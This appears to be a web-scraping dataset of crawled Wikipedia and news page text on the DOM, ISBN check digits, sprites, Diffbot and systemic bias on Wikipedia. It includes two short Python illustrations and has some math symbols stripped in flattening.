funding—the company plans to get moving on the 16 other types. This will involve determining what makes up pages of these types—photos, prices, and so on—and using that information to build algorithms that can process unfamiliar pages. While Diffbot offers its API to customers for free, it charges for high levels of usage. Brad Garlinghouse, the CEO of file-sharing site YouSendIt and an investor in and advisor to Diffbot, says that while the company isn’t currently profitable, it could be without too much trouble. “They’re solving some here-and-now problems that customers are willing to pay for, says Garlinghouse. Currently, a number of Diffbot users are media companies, including Garlinghouse’s previous employer, AOL (Diffbot powers the content aggregation behind AOL’s tablet magazine, Editions). As Davi, of Diffbot, points out, media companies often purchase publications whose online content has been created with a different content-management system. Diffbot’s API can ease the process of consolidating content, he says. As the company makes it possible to analyze pages of additional types, its founders hope to see Diffbot used for things like product price comparison, photo and recipe aggregation, and more. 
Tung says, “It’s going to be really exciting to see what people build.” |
119 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata | This category contains articles whose short description matches the description field of the corresponding Wikidata item. No action is needed. This is a tracking category only. The following 200 pages are in this category, out of approximately 2,038,644 total. This list may not reflect recent changes. |
120 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Document_Object_Model | The Document Object Model (DOM) is a cross-platform and language-independent interface that treats an HTML or XML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree. Each branch of the tree ends in a node, and each node contains objects. DOM methods allow programmatic access to the tree; with them one can change the structure, style or content of a document. 2 Nodes can have event handlers (also known as event listeners) attached to them. Once an event is triggered, the event handlers get executed. 3 The principal standardization of the DOM was handled by the World Wide Web Consortium (W3C), which last developed a recommendation in 2004. WHATWG took over the development of the standard, publishing it as a living document. The W3C now publishes stable snapshots of the WHATWG standard. In HTML DOM (Document Object Model), every element is a node: 4 The history of the Document Object Model is intertwined with the history of the "browser wars" of the late 1990s between Netscape Navigator and Microsoft Internet Explorer, as well as with that of JavaScript and JScript, the first scripting languages to be widely implemented in the JavaScript engines of web browsers. JavaScript was released by Netscape Communications in 1995 within Netscape Navigator 2.0. Netscape's competitor, Microsoft, released Internet Explorer 3.0 the following year with a reimplementation of JavaScript called JScript. JavaScript and JScript let web developers create web pages with client-side interactivity. The limited facilities for detecting user-generated events and modifying the HTML document in the first generation of these languages eventually became known as "DOM Level 0" or "Legacy DOM. No independent standard was developed for DOM Level 0, but it was partly described in the specifications for HTML 4. Legacy DOM was limited in the kinds of elements that could be accessed. Form, link and image elements could be referenced with a hierarchical name that began with the root document object. A hierarchical name could make use of either the names or the sequential index of the traversed elements. For example, a form input element could be accessed as either document.myForm.myInput or document.forms 0 .elements 0 . The Legacy DOM enabled client-side form validation and simple interface interactivity like creating tooltips. In 1997, Netscape and Microsoft released version 4.0 of Netscape Navigator and Internet Explorer respectively, adding support for Dynamic HTML (DHTML) functionality enabling changes to a loaded HTML document. DHTML required extensions to the rudimentary document object that was available in the Legacy DOM implementations. Although the Legacy DOM implementations were largely compatible since JScript was based on JavaScript, the DHTML DOM extensions were developed in parallel by each browser maker and remained incompatible. These versions of the DOM became known as the "Intermediate DOM". After the standardization of ECMAScript, the W3C DOM Working Group began drafting a standard DOM specification. The completed specification, known as "DOM Level 1", became a W3C Recommendation in late 1998. By 2005, large parts of W3C DOM were well-supported by common ECMAScript-enabled browsers, including Internet Explorer 6 (from 2001), Opera, Safari and Gecko-based browsers (like Mozilla, Firefox, SeaMonkey and Camino). 
The W3C DOM Working Group published its final recommendation and subsequently disbanded in 2004. Development efforts migrated to the WHATWG, which continues to maintain a living standard. 5 In 2009, the Web Applications group reorganized DOM activities at the W3C. 6 In 2013, due to a lack of progress and the impending release of HTML5, the DOM Level 4 specification was reassigned to the HTML Working Group to expedite its completion. 7 Meanwhile, in 2015, the Web Applications group was disbanded and DOM stewardship passed to the Web Platform group. 8 Beginning with the publication of DOM Level 4 in 2015, the W3C creates new recommendations based on snapshots of the WHATWG standard. To render a document such as a HTML page, most web browsers use an internal model similar to the DOM. The nodes of every document are organized in a tree structure, called the DOM tree, with the topmost node named as "Document object". When an HTML page is rendered in browsers, the browser downloads the HTML into local memory and automatically parses it to display the page on screen. However, the DOM does not necessarily need to be represented as a tree, 11 and some browsers have used other internal models. 12 When a web page is loaded, the browser creates a Document Object Model of the page, which is an object oriented representation of an HTML document that acts as an interface between JavaScript and the document itself. This allows the creation of dynamic web pages, 13 because within a page JavaScript can: A Document Object Model (DOM) tree is a hierarchical representation of an HTML or XML document. It consists of a root node, which is the document itself, and a series of child nodes that represent the elements, attributes, and text content of the document. Each node in the tree has a parent node, except for the root node, and can have multiple child nodes. Elements in an HTML or XML document are represented as nodes in the DOM tree. Each element node has a tag name, attributes, and can contain other element nodes or text nodes as children. For example, an HTML document with the following structure: will be represented in the DOM tree as: Text content within an element is represented as a text node in the DOM tree. Text nodes do not have attributes or child nodes, and are always leaf nodes in the tree. For example, the text content "My Website" in the title element and "Welcome" in the h1 element in the above example are both represented as text nodes. Attributes of an element are represented as properties of the element node in the DOM tree. For example, an element with the following HTML: will be represented in the DOM tree as: The DOM tree can be manipulated using JavaScript or other programming languages. Common tasks include navigating the tree, adding, removing, and modifying nodes, and getting and setting the properties of nodes. The DOM API provides a set of methods and properties to perform these operations, such as getElementById, createElement, appendChild, and innerHTML. Another way to create a DOM structure is using the innerHTML property to insert HTML code as a string, creating the elements and children in the process. For example: Another method is to use a JavaScript library or framework such as jQuery, AngularJS, React, Vue.js, etc. These libraries provide a more convenient, eloquent and efficient way to create, manipulate and interact with the DOM. 
It is also possible to create a DOM structure from an XML or JSON data, using JavaScript methods to parse the data and create the nodes accordingly. Creating a DOM structure does not necessarily mean that it will be displayed in the web page, it only exists in memory and should be appended to the document body or a specific container to be rendered. In summary, creating a DOM structure involves creating individual nodes and organizing them in a hierarchical structure using JavaScript or other programming languages, and it can be done using several methods depending on the use case and the developer's preference. Because the DOM supports navigation in any direction (e.g., parent and previous sibling) and allows for arbitrary modifications, an implementation must at least buffer the document that has been read so far (or some parsed form of it). 14 Web browsers rely on layout engines to parse HTML into a DOM. Some layout engines, such as Trident MSHTML, are associated primarily or exclusively with a particular browser, such as Internet Explorer. Others, including Blink, WebKit, and Gecko, are shared by a number of browsers, such as Google Chrome, Opera, Safari, and Firefox. The different layout engines implement the DOM standards to varying degrees of compliance. DOM implementations: APIs that expose DOM implementations: Inspection tools: |
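Although the DOM is usually manipulated from JavaScript in the browser, the tree model described above (element nodes, text nodes, attributes, and parent/child links) is exactly what an HTML parser exposes in Python. The following sketch uses BeautifulSoup, which is already installed earlier in this notebook, on a small invented snippet based on the "My Website"/"Welcome" example in the text.
from bs4 import BeautifulSoup

html = """
<html>
  <head><title>My Website</title></head>
  <body><h1 class="greeting">Welcome</h1></body>
</html>
"""

soup = BeautifulSoup(html, "html5lib")

h1 = soup.find("h1")
print(h1.name)            # element node: 'h1'
print(h1.get_text())      # its child text node: 'Welcome'
print(h1["class"])        # attributes exposed as properties: ['greeting']
print(h1.parent.name)     # navigating up to the parent node: 'body'
print(soup.title.string)  # the text node inside <title>: 'My Website'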
121 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/ISBN_(identifier) | The International Standard Book Number (ISBN) is a numeric commercial book identifier that is intended to be unique. a b Publishers purchase or receive ISBNs from an affiliate of the International ISBN Agency. 2 A different ISBN is assigned to each separate edition and variation of a publication, but not to a simple reprinting of an existing item. For example, an e-book, a paperback and a hardcover edition of the same book must each have a different ISBN, but an unchanged reprint of the hardcover edition keeps the same ISBN. The ISBN is ten digits long if assigned before 2007, and thirteen digits long if assigned on or after 1 January 2007. c The method of assigning an ISBN is nation-specific and varies between countries, often depending on how large the publishing industry is within a country. The first version of the ISBN identification format was devised in 1967, based upon the 9 digit Standard Book Numbering (SBN) created in 1966. The 10 digit ISBN format was developed by the International Organization for Standardization (ISO) and was published in 1970 as international standard ISO 2108 (any 9 digit SBN can be converted to a 10 digit ISBN by prefixing it with a zero). Privately published books sometimes appear without an ISBN. The International ISBN Agency sometimes assigns ISBNs to such books on its own initiative. 4 A separate identifier code of a similar kind, the International Standard Serial Number (ISSN), identifies periodical publications such as magazines and newspapers. The International Standard Music Number (ISMN) covers musical scores. The Standard Book Number (SBN) is a commercial system using nine-digit code numbers to identify books. In 1965, British bookseller and stationers WHSmith announced plans to implement a standard numbering system for its books. 1 They hired consultants to work on their behalf, and the system was devised by Gordon Foster, emeritus professor of statistics at Trinity College Dublin. 5 The International Organization for Standardization (ISO) Technical Committee on Documentation sought to adapt the British SBN for international use. The ISBN identification format was conceived in 1967 in the United Kingdom by David Whitaker 6 7 (regarded as the "Father of the ISBN") 8 and in 1968 in the United States by Emery Koltay 6 (who later became director of the U.S. ISBN agency R. R. Bowker). 8 9 10 The 10 digit ISBN format was developed by the ISO and was published in 1970 as international standard ISO 2108. 1 6 The United Kingdom continued to use the nine-digit SBN code until 1974. ISO has appointed the International ISBN Agency as the registration authority for ISBN worldwide and the ISBN Standard is developed under the control of ISO Technical Committee 46 Subcommittee 9 TC 46 SC 9. The ISO on-line facility only refers back to 1978. 11 An SBN may be converted to an ISBN by prefixing the digit "0". For example, the second edition of Mr. J. G. Reeder Returns, published by Hodder in 1965, has "SBN 340 01381 8", where "340" indicates the publisher, "01381" is the serial number assigned by the publisher, and "8" is the check digit. By prefixing a zero, this can be converted to ISBN 0 340 01381 8; the check digit does not need to be re-calculated. 
Some publishers, such as Ballantine Books, would sometimes use 12 digit SBNs where the last three digits indicated the price of the book; 12 for example, Woodstock Handmade Houses had a 12 digit Standard Book Number of 345 24223 8 595 (valid SBN: 345 24223 8, ISBN: 0 345 24223 8), 13 and it cost US$5.95. 14 Since 1 January 2007, ISBNs have contained thirteen digits, a format that is compatible with "Bookland" European Article Numbers, which have 13 digits. 3 The United States, with 3.9 million registered ISBNs in 2020, was by far the biggest user of the ISBN identifier in 2020, followed by the Republic of Korea (329,582), Germany (284,000), China (263,066), the UK (188,553) and Indonesia (144,793). Lifetime ISBNs registered in the United States are over 39 million as of 2020. 15 A separate ISBN is assigned to each edition and variation (except reprintings) of a publication. For example, an ebook, audiobook, paperback, and hardcover edition of the same book must each have a different ISBN assigned to it. 16 : 12 The ISBN is thirteen digits long if assigned on or after 1 January 2007, and ten digits long if assigned before 2007. c 3 An International Standard Book Number consists of four parts (if it is a 10 digit ISBN) or five parts (for a 13 digit ISBN). Section 5 of the International ISBN Agency's official user manual 16 : 11 describes the structure of the 13 digit ISBN, as follows: A 13 digit ISBN can be separated into its parts (prefix element, registration group, registrant, publication and check digit), and when this is done it is customary to separate the parts with hyphens or spaces. Separating the parts (registration group, registrant, publication and check digit) of a 10 digit ISBN is also done with either hyphens or spaces. Figuring out how to correctly separate a given ISBN is complicated, because most of the parts do not use a fixed number of digits. e ISBN issuance is country-specific, in that ISBNs are issued by the ISBN registration agency that is responsible for that country or territory regardless of the publication language. The ranges of ISBNs assigned to any particular country are based on the publishing profile of the country concerned, and so the ranges will vary depending on the number of books and the number, type, and size of publishers that are active. Some ISBN registration agencies are based in national libraries or within ministries of culture and thus may receive direct funding from the government to support their services. In other cases, the ISBN registration service is provided by organisations such as bibliographic data providers that are not government funded. 18 A full directory of ISBN agencies is available on the International ISBN Agency website. 19 A list for a few countries is given below: The ISBN registration group element is a 1 to 5 digit number that is valid within a single prefix element (i.e. one of 978 or 979), 16 : 11 and can be separated between hyphens, such as "978 1 ... . Registration groups have primarily been allocated within the 978 prefix element. 38 The single-digit registration groups within the 978 prefix element are: 0 or 1 for English-speaking countries; 2 for French-speaking countries; 3 for German-speaking countries; 4 for Japan; 5 for Russian-speaking countries; and 7 for People's Republic of China. Example 5 digit registration groups are 99936 and 99980, for Bhutan. The allocated registration groups are: 0 5, 600 631, 65, 7, 80 94, 950 989, 9910 9989, and 99901 99993. 
39 Books published in rare languages typically have longer group elements. 40 Within the 979 prefix element, the registration group 0 is reserved for compatibility with International Standard Music Numbers (ISMNs), but such material is not actually assigned an ISBN. 41 The registration groups within prefix element 979 that have been assigned are 8 for the United States of America, 10 for France, 11 for the Republic of Korea, and 12 for Italy. 42 The original 9 digit standard book number (SBN) had no registration group identifier, but prefixing a zero to a 9 digit SBN creates a valid 10 digit ISBN. The national ISBN agency assigns the registrant element (cf. Category:ISBN agencies) and an accompanying series of ISBNs within that registrant element to the publisher; the publisher then allocates one of the ISBNs to each of its books. In most countries, a book publisher is not legally required to assign an ISBN, although most large bookstores only handle publications that have ISBNs assigned to them. 43 44 45 The International ISBN Agency maintains the details of over one million ISBN prefixes and publishers in the Global Register of Publishers. 46 This database is freely searchable over the internet. Publishers receive blocks of ISBNs, with larger blocks allotted to publishers expecting to need them; a small publisher may receive ISBNs of one or more digits for the registration group identifier, several digits for the registrant, and a single digit for the publication element. Once that block of ISBNs is used, the publisher may receive another block of ISBNs, with a different registrant element. Consequently, a publisher may have different allotted registrant elements. There also may be more than one registration group identifier used in a country. This might occur once all the registrant elements from a particular registration group have been allocated to publishers. By using variable block lengths, registration agencies are able to customise the allocations of ISBNs that they make to publishers. For example, a large publisher may be given a block of ISBNs where fewer digits are allocated for the registrant element and many digits are allocated for the publication element; likewise, countries publishing many titles have few allocated digits for the registration group identifier and many for the registrant and publication elements. 47 Here are some sample ISBN 10 codes, illustrating block length variations. English-language registration group elements are 0 and 1 (2 of more than 220 registration group elements). These two registration group elements are divided into registrant elements in a systematic pattern, which allows their length to be determined, as follows: 17 A check digit is a form of redundancy check used for error detection, the decimal equivalent of a binary check bit. It consists of a single digit computed from the other digits in the number. The method for the 10 digit ISBN is an extension of that for SBNs, so the two systems are compatible; an SBN prefixed with a zero (the 10 digit ISBN) will give the same check digit as the SBN without the zero. The check digit is base eleven, and can be an integer between 0 and 9, or an 'X'. The system for 13 digit ISBNs is not compatible with SBNs and will, in general, give a different check digit from the corresponding 10 digit ISBN, so does not provide the same protection against transposition. This is because the 13 digit code was required to be compatible with the EAN format, and hence could not contain the letter 'X'. 
According to the 2001 edition of the International ISBN Agency's official user manual, 48 the ISBN 10 check digit (which is the last digit of the 10 digit ISBN) must range from 0 to 10 (the symbol 'X' is used for 10), and must be such that the sum of the ten digits, each multiplied by its (integer) weight, descending from 10 to 1, is a multiple of 11. That is, if xi is the ith digit, then x10 must be chosen such that: For example, for an ISBN 10 of 0 306 40615 2: Formally, using modular arithmetic, this is rendered It is also true for ISBN 10s that the sum of all ten digits, each multiplied by its weight in ascending order from 1 to 10, is a multiple of 11. For this example: Formally, this is rendered The two most common errors in handling an ISBN (e.g. when typing it or writing it down) are a single altered digit or the transposition of adjacent digits. It can be proven mathematically that all pairs of valid ISBN 10s differ in at least two digits. It can also be proven that there are no pairs of valid ISBN 10s with eight identical digits and two transposed digits (these proofs are true because the ISBN is less than eleven digits long and because 11 is a prime number). The ISBN check digit method therefore ensures that it will always be possible to detect these two most common types of error, i.e., if either of these types of error has occurred, the result will never be a valid ISBN—the sum of the digits multiplied by their weights will never be a multiple of 11. However, if the error were to occur in the publishing house and remain undetected, the book would be issued with an invalid ISBN. 49 In contrast, it is possible for other types of error, such as two altered non-transposed digits, or three altered digits, to result in a valid ISBN (although it is still unlikely). Each of the first nine digits of the 10 digit ISBN—excluding the check digit itself—is multiplied by its (integer) weight, descending from 10 to 2, and the sum of these nine products found. The value of the check digit is simply the one number between 0 and 10 which, when added to this sum, means the total is a multiple of 11. For example, the check digit for an ISBN 10 of 0 306 40615 ? is calculated as follows: Adding 2 to 130 gives a multiple of 11 (because 132 12 11)—this is the only number between 0 and 10 which does so. Therefore, the check digit has to be 2, and the complete sequence is ISBN 0 306 40615 2. If the value of x 10 displaystyle x 10 required to satisfy this condition is 10, then an 'X' should be used. Alternatively, modular arithmetic is convenient for calculating the check digit using modulus 11. The remainder of this sum when it is divided by 11 (i.e. its value modulo 11), is computed. This remainder plus the check digit must equal either 0 or 11. Therefore, the check digit is (11 minus the remainder of the sum of the products modulo 11) modulo 11. Taking the remainder modulo 11 a second time accounts for the possibility that the first remainder is 0. Without the second modulo operation, the calculation could result in a check digit value of 11 0 11, which is invalid. (Strictly speaking, the first "modulo 11" is not needed, but it may be considered to simplify the calculation.) For example, the check digit for the ISBN of 0 306 40615 ? is calculated as follows: Thus the check digit is 2. It is possible to avoid the multiplications in a software implementation by using two accumulators. 
Repeatedly adding t into s computes the necessary multiples: The modular reduction can be done once at the end, as shown above (in which case s could hold a value as large as 496, for the invalid ISBN 99999 999 9 X), or s and t could be reduced by a conditional subtract after each addition. Appendix 1 of the International ISBN Agency's official user manual 16 : 33 describes how the 13 digit ISBN check digit is calculated. The ISBN 13 check digit, which is the last digit of the ISBN, must range from 0 to 9 and must be such that the sum of all the thirteen digits, each multiplied by its (integer) weight, alternating between 1 and 3, is a multiple of 10. As ISBN 13 is a subset of EAN 13, the algorithm for calculating the check digit is exactly the same for both. Formally, using modular arithmetic, this is rendered: The calculation of an ISBN 13 check digit begins with the first twelve digits of the 13 digit ISBN (thus excluding the check digit itself). Each digit, from left to right, is alternately multiplied by 1 or 3, then those products are summed modulo 10 to give a value ranging from 0 to 9. Subtracted from 10, that leaves a result from 1 to 10. A zero replaces a ten, so, in all cases, a single check digit results. For example, the ISBN 13 check digit of 978 0 306 40615 ? is calculated as follows: Thus, the check digit is 7, and the complete sequence is ISBN 978 0 306 40615 7. In general, the ISBN check digit is calculated as follows. Let Then This check system—similar to the UPC check digit formula—does not catch all errors of adjacent digit transposition. Specifically, if the difference between two adjacent digits is 5, the check digit will not catch their transposition. For instance, the above example allows this situation with the 6 followed by a 1. The correct order contributes 3 6 1 1 19 to the sum; while, if the digits are transposed (1 followed by a 6), the contribution of those two digits will be 3 1 1 6 9. However, 19 and 9 are congruent modulo 10, and so produce the same, final result: both ISBNs will have a check digit of 7. The ISBN 10 formula uses the prime modulus 11 which avoids this blind spot, but requires more than the digits 0 9 to express the check digit. Additionally, if the sum of the 2nd, 4th, 6th, 8th, 10th, and 12th digits is tripled then added to the remaining digits (1st, 3rd, 5th, 7th, 9th, 11th, and 13th), the total will always be divisible by 10 (i.e., end in 0). A 10 digit ISBN is converted to a 13 digit ISBN by prepending "978" to the ISBN 10 and recalculating the final checksum digit using the ISBN 13 algorithm. The reverse process can also be performed, but not for numbers commencing with a prefix other than 978, which have no 10 digit equivalent. Publishers and libraries have varied policies about the use of the ISBN check digit. Publishers sometimes fail to check the correspondence of a book title and its ISBN before publishing it; that failure causes book identification problems for libraries, booksellers, and readers. 50 For example, ISBN 0 590 76484 5 is shared by two books—Ninja gaiden: a novel based on the best-selling game by Tecmo (1990) and Wacky laws (1997), both published by Scholastic. Most libraries and booksellers display the book record for an invalid ISBN issued by the publisher. The Library of Congress catalogue contains books published with invalid ISBNs, which it usually tags with the phrase "Cancelled ISBN". 
51 The International Union Library Catalog (a.k.a., WorldCat OCLC—Online Computer Library Center system) often indexes by invalid ISBNs, if the book is indexed in that way by a member library. 52 Only the term "ISBN" should be used; the terms "eISBN" and "e-ISBN" have historically been sources of confusion and should be avoided. If a book exists in one or more digital (e-book) formats, each of those formats must have its own ISBN. In other words, each of the three separate EPUB, Amazon Kindle, and PDF formats of a particular book will have its own specific ISBN. They should not share the ISBN of the paper version, and there is no generic "eISBN" which encompasses all the e-book formats for a title. 53 The barcodes on a book's back cover (or inside a mass-market paperback book's front cover) are EAN 13; they may have a separate barcode encoding five digits called an EAN 5 for the currency and the recommended retail price. 54 For 10 digit ISBNs, the number "978", the Bookland "country code", is prefixed to the ISBN in the barcode data, and the check digit is recalculated according to the EAN 13 formula (modulo 10, 1 and 3 weighting on alternating digits). Partly because of an expected shortage in certain ISBN categories, the International Organization for Standardization (ISO) decided to migrate to a 13 digit ISBN (ISBN 13). The process began on 1 January 2005 and was planned to conclude on 1 January 2007. 55 As of 2011 update , all the 13 digit ISBNs began with 978. As the 978 ISBN supply is exhausted, the 979 prefix was introduced. Part of the 979 prefix is reserved for use with the Musicland code for musical scores with an ISMN. The 10 digit ISMN codes differed visually as they began with an "M" letter; the bar code represents the "M" as a zero, and for checksum purposes it counted as a 3. All ISMNs are now thirteen digits commencing 979 0; 979 1 to 979 9 will be used by ISBN. Publisher identification code numbers are unlikely to be the same in the 978 and 979 ISBNs, likewise, there is no guarantee that language area code numbers will be the same. Moreover, the 10 digit ISBN check digit generally is not the same as the 13 digit ISBN check digit. Because the GTIN 13 is part of the Global Trade Item Number (GTIN) system (that includes the GTIN 14, the GTIN 12, and the GTIN 8), the 13 digit ISBN falls within the 14 digit data field range. 56 Barcode format compatibility is maintained, because (aside from the group breaks) the ISBN 13 barcode format is identical to the EAN barcode format of existing 10 digit ISBNs. So, migration to an EAN-based system allows booksellers the use of a single numbering system for both books and non-book products that is compatible with existing ISBN based data, with only minimal changes to information technology systems. Hence, many booksellers (e.g., Barnes Noble) migrated to EAN barcodes as early as March 2005. Although many American and Canadian booksellers were able to read EAN 13 barcodes before 2005, most general retailers could not read them. The upgrading of the UPC barcode system to full EAN 13, in 2005, eased migration to the ISBN in North America. |
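The check-digit rules described above translate directly into a few lines of Python. The sketch below simply reimplements the two formulas and reproduces the worked examples from the text (ISBN 0 306 40615 2 and ISBN 978 0 306 40615 7); it illustrates the arithmetic only and is not a full ISBN validator (no hyphenation or registration-group range checks).
def isbn10_check_digit(first9: str) -> str:
    # Weights descend from 10 to 2; the check digit makes the weighted
    # sum a multiple of 11, with 'X' standing for a value of 10.
    total = sum(w * int(d) for w, d in zip(range(10, 1, -1), first9))
    check = (11 - total % 11) % 11
    return "X" if check == 10 else str(check)

def isbn13_check_digit(first12: str) -> str:
    # Weights alternate 1, 3, 1, 3, ...; the check digit brings the
    # weighted sum up to the next multiple of 10.
    total = sum((1 if i % 2 == 0 else 3) * int(d) for i, d in enumerate(first12))
    return str((10 - total % 10) % 10)

print(isbn10_check_digit("030640615"))     # -> 2, matching the worked example
print(isbn13_check_digit("978030640615"))  # -> 7, matching the worked example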
123 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/CSS_sprite | In computer graphics, a sprite is a two-dimensional bitmap that is integrated into a larger scene, most often in a 2D video game. Originally, the term sprite referred to fixed-sized objects composited together, by hardware, with a background. 1 Use of the term has since become more general. Systems with hardware sprites include arcade video games of the 1970s and 1980s; game consoles including as the Atari VCS (1977), ColecoVision (1982), Famicom (1983), Genesis Mega Drive (1988); and home computers such as the TI 99 4 (1979), Atari 8 bit computers (1979), Commodore 64 (1982), MSX (1983), Amiga (1985), and X68000 (1987). Hardware varies in the number of sprites supported, the size and colors of each sprite, and special effects such as scaling or reporting pixel-precise overlap. Hardware composition of sprites occurs as each scan line is prepared for the video output device, such as a cathode-ray tube, without involvement of the main CPU and without the need for a full-screen frame buffer. 1 Sprites can be positioned or altered by setting attributes used during the hardware composition process. The number of sprites which can be displayed per scan line is often lower than the total number of sprites a system supports. For example, the Texas Instruments TMS9918 chip supports 32 sprites, but only four can appear on the same scan line. The CPUs in modern computers, video game consoles, and mobile devices are fast enough that bitmaps can be drawn into a frame buffer without special hardware assistance. Beyond that, GPUs can render vast numbers of scaled, rotated, antialiased, partially translucent, very high resolution images in parallel with the CPU. According to Karl Guttag, one of two engineers for the 1979 Texas Instruments TMS9918 video display processor, this use of the word sprite came from David Ackley, a manager at TI. 2 It was also used by Danny Hillis at Texas Instruments in the late 1970s. 3 The term was derived from the fact that sprites "float" on top of the background image without overwriting it, much like a ghost or mythological sprite. Some hardware manufacturers used different terms, especially before sprite became common: Player Missile Graphics was a term used by Atari, Inc. for hardware sprites in the Atari 8 bit computers (1979) and Atari 5200 console (1982). 4 The term reflects the use for both characters ("players") and smaller associated objects ("missiles") that share the same color. The earlier Atari Video Computer System and some Atari arcade games used player, missile, and ball. Stamp was used in some arcade hardware in the early 1980s, including Ms. Pac-Man. 5 Movable Object Block, or MOB, was used in MOS Technology's graphics chip literature. Commodore, the main user of MOS chips and the owner of MOS for most of the chip maker's lifetime, instead used the term sprite for the Commodore 64. OBJs (short for objects) is used in the developer manuals for the NES, Super NES, and Game Boy. The region of video RAM used to store sprite attributes and coordinates is called OAM (Object Attribute Memory). This also applies to the Game Boy Advance and Nintendo DS. The use of sprites originated with arcade video games. Nolan Bushnell came up with the original concept when he developed the first arcade video game, Computer Space (1971). 
Technical limitations made it difficult to adapt the early mainframe game Spacewar (1962), which performed an entire screen refresh for every little movement, so he came up with a solution to the problem: controlling each individual game element with a dedicated transistor. The rockets were essentially hardwired bitmaps that moved around the screen independently of the background, an important innovation for producing screen images more efficiently and providing the basis for sprite graphics. 6 The earliest video games to represent player characters as human player sprites were arcade sports video games, beginning with Taito's TV Basketball, 7 8 9 released in April 1974 and licensed to Midway Manufacturing for release in North America. 10 Designed by Tomohiro Nishikado, he wanted to move beyond simple Pong-style rectangles to character graphics, by rearranging the rectangle shapes into objects that look like basketball players and basketball hoops. 11 12 Ramtek released another sports video game in October 1974, Baseball, 10 which similarly displayed human-like characters. 13 The Namco Galaxian arcade system board, for the 1979 arcade game Galaxian, displays animated, multi-colored sprites over a scrolling background. 14 It became the basis for Nintendo's Radar Scope and Donkey Kong arcade hardware and home consoles such as the Nintendo Entertainment System. 15 According to Steve Golson from General Computer Corporation, the term "stamp" was used instead of "sprite" at the time. 5 Signetics devised the first chips capable of generating sprite graphics (referred to as objects by Signetics) for home systems. The Signetics 2636 video processors were first used in the 1978 1292 Advanced Programmable Video System and later in the 1979 Elektor TV Games Computer. The Atari VCS, released in 1977, has a hardware sprite implementation where five graphical objects can be moved independently of the game playfield. The term sprite was not in use at the time. The VCS's sprites are called movable objects in the programming manual, further identified as two players, two missiles, and one ball. 16 These each consist of a single row of pixels that are displayed on a scan line. To produce a two-dimensional shape, the sprite's single-row bitmap is altered by software from one scan line to the next. The 1979 Atari 400 and 800 home computers have similar, but more elaborate, circuitry capable of moving eight single-color objects per scan line: four 8 bit wide players and four 2 bit wide missiles. Each is the full height of the display—a long, thin strip. DMA from a table in memory automatically sets the graphics pattern registers for each scan line. Hardware registers control the horizontal position of each player and missile. Vertical motion is achieved by moving the bitmap data within a player or missile's strip. The feature was called player missile graphics by Atari. Texas Instruments developed the TMS9918 chip with sprite support for its 1979 TI 99 4 home computer. An updated version is used in the 1981 TI 99 4A. These are base hardware specs and do not include additional programming techniques, such as using raster interrupts to repurpose sprites mid-frame. |
124 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:WikiProject_Countering_systemic_bias | The Wikipedia project contains several types of WP:NPOV violations that arise from systemic bias in the demographics of the editor community. 1 Encyclopedic coverage is imbalanced and often omits points of view from under-represented demographic groups. Systemic bias on Wikipedia may take the form of gender, geographical, racial, ideological, and other forms of bias. See Further reading for studies, statistics, and more information that demonstrate contributor or subject imbalances. The first goal is extremely broad, as under-represented POVs may affect almost any article. It may be advisable to focus on projects within the scope of the related WikiProjects listed below. The second goal can be accomplished by WikiProject members sharing the latest research about Wikipedia's systemic bias on this WikiProject's talk page, as well as in articles about Wikipedia itself and in relevant content and policy discussions among editors. Research consistently finds systemic bias in Wikipedia's selection of articles in its various language editions. 1 2 This bias leads, without necessarily any conscious intention, to the propagation of various prejudices and omission of important information. Wikipedia's increasing influence on the way people comprehend the world makes this bias a potentially serious threat. Wikipedia has a longstanding controversy concerning gender bias and sexism. 3 4 5 6 7 8 Wikipedia has been criticized 3 by some journalists and academics for lacking not only female contributors but also extensive and in-depth encyclopedic attention to many topics regarding gender. An article in The New York Times cites a Wikimedia Foundation study which found that fewer than 13% of contributors to Wikipedia were women. Sue Gardner, then the executive director of the foundation, said increasing diversity was about making the encyclopedia "as good as it could be". Factors the article cited as possibly discouraging women from editing included the "obsessive fact-loving realm", associations with the "hard-driving hacker crowd", and the necessity to be "open to very difficult, high-conflict people, even misogynists". 4 A challenge for editors trying to add Black history articles to Wikipedia is the requirement that potential article topics, such as historical individuals or events, meet Wikipedia's "notability" criteria. Sara Boboltz of HuffPost wrote that the Wikipedia notability criteria "is a troubling problem for those fighting for more content about women and minorities", because "there's simply less published documentation on many accomplished women and minorities throughout history they were often ignored, after all, or forced to make their contributions as someone else's assistant. 9 Maher stated that one issue is that "content on Wikipedia has to be backed up by secondary sources, sources that she says throughout history have contained a bias toward white men; "people of color have not been represented in mainstream knowledge creation or inclusion in that knowledge, as "encyclopedias of old were mostly written by European men. 10 Although these assume bias, the presence of white nationalists and other far-right extremists on Wikipedia is an ongoing problem that is unlikely to go away in the near future given the rightward political shift in countries where the majority of the site’s users live. 
The SPLC cited the article Race and intelligence as an example of the alt-right influence on Wikipedia, stating that at that time the article presented a "false balance" between fringe racialist views and the "mainstream perspective in psychology. 11 Some task forces that focus on particular aspects of systemic bias are linked below: Talk pages for the following task forces have not been edited in over a year: There are many things you may do, listed roughly from least to most intensive: There are several WikiProjects and regional notice boards that have potential to help out in our efforts. We may also eventually want to create new WikiProjects as part of this effort. WikiProjects: See also: See also: Also The template globalize may be placed to produce The template toofewopinions may be placed to produce The template religion primary may be placed to produce The template recentism may be placed to produce When these templates are used they should be accompanied by a brief note on the talk page to outline what exactly you feel needs to be addressed. Please add your name to the members page. We of course encourage all members of WikiProject Countering systemic bias, to also promote their membership to other Wikipedians, by adding the Userbox template to their personal user page. This is fast and easy to do. You only need to add this line at your user page: User WikiProject Countering systemic bias , and then you will find this wonderful blue userbox displayed: If you have specific interests relating to countering systemic bias, feel free to briefly describe them there or on this Wikiproject's talk page so we can get a sense of the strengths of the project. |
